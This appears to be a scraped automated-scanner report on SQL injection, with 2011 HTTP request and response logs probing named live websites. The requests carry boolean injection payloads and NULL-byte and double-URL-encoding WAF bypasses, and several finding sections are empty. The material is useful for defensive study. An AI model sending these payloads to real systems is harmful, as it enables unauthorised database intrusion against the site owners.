SQL Injection, DORK, CWE-89, CAPEC-66, SQLi

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.

1.1. http://amch.questionmarket.com/adsc/d647401/46/799689/randm.js [REST URL parameter 1] next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://amch.questionmarket.com
Path:	/adsc/d647401/46/799689/randm.js

Issue detail

Request 1

GET /adsc'/d647401/46/799689/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:42 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Keep-Alive: timeout=120
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 1059

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
<dd>
If you think this is a server error, please contact
the <a href="mailto:serveradmin@dynamiclogic.com">
...[SNIP]...

Request 2

GET /adsc''/d647401/46/799689/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:42 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Content-Length: 231
Keep-Alive: timeout=120, max=903
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /adsc''/d647401/46/799689/randm.js was not found on t
...[SNIP]...

1.2. http://amch.questionmarket.com/adsc/d724324/16/752264/randm.js [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://amch.questionmarket.com
Path:	/adsc/d724324/16/752264/randm.js

Issue detail

The REST URL parameter 5 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 5, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /adsc/d724324/16/752264/randm.js%00' HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:31 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Keep-Alive: timeout=120
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 1059

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
<dd>
If you think this is a server error, please contact
the <a href="mailto:serveradmin@dynamiclogic.com">
...[SNIP]...

Request 2

GET /adsc/d724324/16/752264/randm.js%00'' HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 21:48:24 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 318
Keep-Alive: timeout=120, max=709
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /adsc/d724324/16/752264/randm.js was not found on thi
...[SNIP]...

1.3. http://amch.questionmarket.com/adsc/d724324/27/726813/randm.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://amch.questionmarket.com
Path:	/adsc/d724324/27/726813/randm.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /adsc%2527/d724324/27/726813/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:34 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Keep-Alive: timeout=120
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 1059

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
<dd>
If you think this is a server error, please contact
the <a href="mailto:serveradmin@dynamiclogic.com">
...[SNIP]...

Request 2

GET /adsc%2527%2527/d724324/27/726813/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:34 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Content-Length: 235
Keep-Alive: timeout=120, max=890
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /adsc%27%27/d724324/27/726813/randm.js was not found
...[SNIP]...

1.4. http://amch.questionmarket.com/adsc/d724324/27/752289/randm.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://amch.questionmarket.com
Path:	/adsc/d724324/27/752289/randm.js

Issue detail

The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET /adsc/d724324/27%00'/752289/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:36 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Keep-Alive: timeout=120
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 1059

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
<dd>
If you think this is a server error, please contact
the <a href="mailto:serveradmin@dynamiclogic.com">
...[SNIP]...

Request 2

GET /adsc/d724324/27%00''/752289/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:36 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Content-Length: 213
Keep-Alive: timeout=120, max=982
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /adsc/d724324/27 was not found on this server.</p>
</
...[SNIP]...

1.5. http://amch.questionmarket.com/adsc/d747416/11/748729/randm.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://amch.questionmarket.com
Path:	/adsc/d747416/11/748729/randm.js

Issue detail

The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 4, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET /adsc/d747416/11/748729%00'/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:37 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Keep-Alive: timeout=120
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 1059

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
<dd>
If you think this is a server error, please contact
the <a href="mailto:serveradmin@dynamiclogic.com">
...[SNIP]...

Request 2

GET /adsc/d747416/11/748729%00''/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:37 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Content-Length: 220
Keep-Alive: timeout=120, max=902
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /adsc/d747416/11/748729 was not found on this server.
...[SNIP]...

1.6. http://amch.questionmarket.com/adsc/d763769/11/770950/randm.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://amch.questionmarket.com
Path:	/adsc/d763769/11/770950/randm.js

Issue detail

Request 1

GET /adsc'/d763769/11/770950/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:39 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Keep-Alive: timeout=120
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 1059

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
<dd>
If you think this is a server error, please contact
the <a href="mailto:serveradmin@dynamiclogic.com">
...[SNIP]...

Request 2

GET /adsc''/d763769/11/770950/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:39 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Content-Length: 231
Keep-Alive: timeout=120, max=496
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /adsc''/d763769/11/770950/randm.js was not found on t
...[SNIP]...

1.7. http://amch.questionmarket.com/adsc/d793570/3/793591/randm.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://amch.questionmarket.com
Path:	/adsc/d793570/3/793591/randm.js

Issue detail

Remediation detail

Request 1

GET /adsc/d793570/3%00'/793591/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:41 GMT
Server: Apache
Vary: accept-language
Accept-Ranges: bytes
Keep-Alive: timeout=120
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en
Content-Length: 1059

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="
...[SNIP]...
<dd>
If you think this is a server error, please contact
the <a href="mailto:serveradmin@dynamiclogic.com">
...[SNIP]...

Request 2

GET /adsc/d793570/3%00''/793591/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:41 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Content-Length: 212
Keep-Alive: timeout=120, max=906
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /adsc/d793570/3 was not found on this server.</p>
</b
...[SNIP]...

1.8. http://amch.questionmarket.com/adsc/d798609/10/805369/randm.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://amch.questionmarket.com
Path:	/adsc/d798609/10/805369/randm.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

Request 1

GET /adsc%00'/d798609/10/805369/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

Request 2

GET /adsc%00''/d798609/10/805369/randm.js HTTP/1.1
Host: amch.questionmarket.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 22:03:42 GMT
Server: Apache-AdvancedExtranetServer/2.0.50
Content-Length: 202
Keep-Alive: timeout=120, max=905
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /adsc was not found on this server.</p>
</body></html
...[SNIP]...

1.9. http://blog.supermedia.com/archives/tips/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://blog.supermedia.com
Path:	/archives/tips/

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads 21150963'%20or%201%3d1--%20 and 21150963'%20or%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /archives/tips21150963'%20or%201%3d1--%20/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response 1

HTTP/1.0 500 Internal Server Error
Date: Thu, 03 Feb 2011 19:48:47 GMT
Server: Unspecified
Content-Length: 0
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:04:06 GMT;path=/

Request 2

GET /archives/tips21150963'%20or%201%3d2--%20/ HTTP/1.1
Host: blog.supermedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; campaign_track=BP%3AUpdate%20Your%20Profile%20Top; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660; s_sq=%5B%5BB%5D%5D; undefined_s=First%20Visit; mbox=session#1296759528614-838261#1296763697|check#true#1296761897;

Response 2

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 19:49:06 GMT
Server: Unspecified
Connection: close
Content-Type: text/html
Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff948213d345525d5f4f58455e445a4a423660;expires=Thu, 03-Feb-2011 20:04:06 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>SuperMedia Blog | SuperMedia.com</title>

<link rel="alternate" type="application/rss+xml" title="RSS Feed" href="/feed/" />
<link rel="alternate" type="application/atom+xml" title="Atom Feed" href="/feed/atom/" />

<link type="text/css" rel="stylesheet" href="http://www.superpages.com/inc/social/soc.css" >
<link rel="stylesheet" type="text/css" href="http://www.supermedia.com/spportal/style/cobrand.css" >
<link rel="stylesheet" type="text/css" href="http://www.supermedia.com/spportal/style/supermedia/supermedia.css">
<link rel="stylesheet" type="text/css" href="/main.css">
<script type="text/javascript" src="http://www.supermedia.com/spportal/js/jquery/jquery-1.3.2.min.js"></script>
<script type="text/javascript" src="http://www.supermedia.com/spportal/js/jquery/blockui.js"></script>
<script type="text/javascript" language="JavaScript" src="http://www.supermedia.com/spportal/js/cookies.js"></script>
<script type="text/javascript" language="JavaScript" src="http://www.supermedia.com/spportal/js/header.js"></script>

<meta name="decorator" content="supermedia">

<meta name="keywords" content="directory advertising options, business directory marketing options, directory options, yellow pages, business directories, Spanish yellow pages, digital directories">
<meta name="description" content="Our directories complement each other to give you an unmatched reach to every audience imaginable including companion directories, bilingual and spanish directories, business to businesss (b2b) directories and digital directories.">
<link rel="STYLESHEET" type="text/css" href="http://www.supermedia.com/spportal/style/sup
...[SNIP]...

1.10. http://docs.jquery.com/UI/Dialog [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://docs.jquery.com
Path:	/UI/Dialog

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /UI/Dialog?1%2527=1 HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:07:57 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 14991

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...
<title>Database error - jQuery JavaScript Library</title>
...[SNIP]...

Request 2

GET /UI/Dialog?1%2527%2527=1 HTTP/1.1
Host: docs.jquery.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 22:08:53 GMT
Server: Apache/2.2.8 (Debian) PHP/5.2.3-1+lenny1
X-Powered-By: PHP/5.2.3-1+lenny1
Content-language: en
Vary: Accept-Encoding,Cookie
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: private, must-revalidate, max-age=0
Last-modified: Mon, 31 Jan 2011 21:54:34 GMT
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 58688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
   <head>
       <meta http-equiv="con
...[SNIP]...

1.11. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bizfind.us
Path:	/15/182221/abc-development-inc/chicago.aspx/x22

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /15/182221'/abc-development-inc/chicago.aspx/x22 HTTP/1.1
Host: www.bizfind.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Thu, 03 Feb 2011 21:48:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 5453
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQQCTAQA=KHEEKNBBHJMPFGDEDDNMBPHF; path=/
Cache-control: private

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22</title>
<meta name="descrip
...[SNIP]...

Request 2

GET /15/182221''/abc-development-inc/chicago.aspx/x22 HTTP/1.1
Host: www.bizfind.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 21:48:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 11282
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQQCTAQA=MHEEKNBBLHOHJNHBIPNHJKNL; path=/
Cache-control: private

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22</title>
<meta name="descrip
...[SNIP]...

1.12. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bizfind.us
Path:	/15/182221/abc-development-inc/chicago.aspx/x22

Issue detail

Request 1

GET /15/182221/abc-development-inc/chicago.aspx/x22' HTTP/1.1
Host: www.bizfind.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Thu, 03 Feb 2011 21:48:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 1369
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQQCTAQA=CJEEKNBBDCJDLMEACLODNOPI; path=/
Cache-control: private

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22'</title>
<meta name="descri
...[SNIP]...

Request 2

GET /15/182221/abc-development-inc/chicago.aspx/x22'' HTTP/1.1
Host: www.bizfind.us
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 21:48:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 11302
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSQQCTAQA=EJEEKNBBLAHNPDBHLMHJLNKM; path=/
Cache-control: private

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>ABC DEVELOPMENT INC - CHICAGO/X22''</title>
<meta name="descr
...[SNIP]...

1.13. http://www.bizfind.us/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.bizfind.us
Path:	/15/182221/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1)

Issue detail

Request 1

GET /15/182221'/abc-development-inc/chicago.aspx/x22/%22ns=%22alert(0x0006C1) HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.bizfind.us

Response 1

HTTP/1.1 500 Internal Server Error
Date: Fri, 04 Feb 2011 18:01:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PleskWin
MicrosoftOfficeWebServer: 5.0_Pub
Content-Length: 5859
Content-Type: text/html
Set-Cookie: ASPSESSIONIDQSSDQDQB=NIMOGJOBDKLPJKOOCEPBMLJI; path=/
Cache-control: private

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
